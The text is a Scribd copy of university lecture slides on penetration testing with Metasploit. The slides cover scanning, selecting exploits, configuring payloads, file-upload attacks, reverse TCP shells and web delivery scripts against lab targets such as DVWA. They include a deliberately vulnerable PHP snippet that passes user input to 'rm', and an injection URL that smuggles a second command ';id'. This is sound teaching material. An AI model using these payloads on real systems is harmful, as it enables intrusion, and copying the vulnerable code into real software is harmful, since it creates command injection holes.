Scribd
Upload
34 views

Lecture 7 Metasploit

Uploaded by

rotedi4150
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
34 views

Lecture 7 Metasploit

Uploaded by

rotedi4150
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 26

Security

vulnerabilities
and penetration
testing
Dr Phillip James
Recap and Last week we explored vulnerabilities and
today penetration techniques for
• Web services
• Web applications

This week we will explore:


• Frameworks for penetration testing
• Some attacks they support
Penetration
testing
frameworks
Metasploit
“The worlds most used platform”

The big ones Vulnerability lists, exploits, tools.

OpenVas

A good vulnerability scanner


and manager, comes with Kali.

Cobalt strike (Costs a lot)


(Armitage open source)
A front-end with some extras
for Metasploit. Useful for
visualizing vulnerabilities.
Metasploitable: virtual machine containing many of
the below.
Vulnerable
systems DVWA: Damn vulnerable web app. Configurable
levels of security and weaknesses.

WebGoat: Another insecure web app from OWASP.


Comes with tutorials!

Bwapp: An extremely buggy web app… you get the


idea!

Vulnhub: Many virtual machines all with various


vulnerabilities.

RasPwn OS: A very insecure Raspberry Pi image.


Metasploit
The steps One basic workflow for using Metasploit is as follows:

1. Run Metasploit.
2. Identify a remote host and add to the metasploit
database.
3. Identify a vulnerability in the remote host that you wish to
exploit and select exploit.
4. Configure the payload to exploit the vulnerability in the
remote host.
5. Execute the payload against the remote host.
Assuming your using Kali:
Select Exploitation Tools -> Metasploit
Running Or run:
msfconsole

Note: you may need to start database service and initialize on


first run: service postgresql start, msfdb init
Run nmap, but store results in database:
db_nmap -v -sV <ip_range>
Identifying
hosts Use “hosts” to show all found hosts.

We can still use nmap scripts to help with detection of


vulnerabilities:
db_nmap –sV –script vulners <ip_address>
Grab one of those CVE values, and simply search to see if
Pick one Metasploit can help:

search <CVE or Keyword>


Use the info command to check out what the exploit does:
info <exploit_name>
Select exploit

To use that exploit:


use exploit/path/to/exploit_name
List them with: show payloads
Select
payload/target

To use a payload select:


set payload <chosen_payload>

Can then also list targets (which are like parameters to


payload).
To see required configuration:
show options
Configure
payload/target

To setup options:
set <option> <value>

e.g. set LHOST 192.168.1.115


run
Execute
payload Or

exploit

Wallah!
Stuck? You can always get help:

help <command>
Demo: File
upload
The first step in many attacks is to get some code to the
system to be attacked.
Simple idea Then find a way to get the code executed.

Using a file upload helps the attacker accomplish the first step.

Example: wpshop plugin (2015)

• No sanitization on the file name or contents.


• This allows an attacker to upload a file with a .php extension
which can then be accessed by the attacker from the web
and executed.
DVWA, of
course has this
• Allows by-passing of firewalls.

Payload: • A firewall usually blocks incoming connections on open


reverse TCP ports, but does not block outgoing traffic.

• A reverse connection avoid this but also runs the shell


Attacker: why don’t you connect commands on the victims machine.
to me?

Victim connects to
attacker on listening port
Victim IP: Attacker IP:
192.168.1.12 192.168.1.13
Listener port:
4444
Crafting with
Metasploit

It works! (see demo)


Demo: Command
injection
Command injection attacks are when an application passes
unsafe user supplied data to a system shell.
Again, simple
idea Example:
<?php
print("Please specify the name of the file to delete");
$file=$_GET['filename'];
system("rm $file");
?>

Attack:
http://127.0.0.1/delete.php?filename=bob.txt;id

Response:
Please specify the name of the file to delete uid=11(www-data)
gid=11(www-data) groups=11(www-data)
DVWA, of
course has this
We can now run any system command we like.
Hence! web
delivery scripts Wait…

Let’s see what metasploit offers:

“Metasploit’s Web Delivery Script is a versatile module


that creates a server on the attacking machine which
hosts a payload. When the victim connects to the
attacking server, the payload will be executed on the
victim machine.”
Crafting with
metasploit

It works! (see demo)


*not remove the SSL stuff at the end as it is not
supported in older php versions.
We have explored pentration testing frameworks:
Summary • Metasploit, including:
• Running scans
• Crafting exploits
Noun: a brief statement or account
• Configuring payloads.
of the main points of something. • Two more vulnerabilities:
• Command injection
• File uploads
• Demo’s with DVWA

Lab: Getting to know Metasploit and Metasploitable.

Next week: Clearing tracks and documentation.

You might also like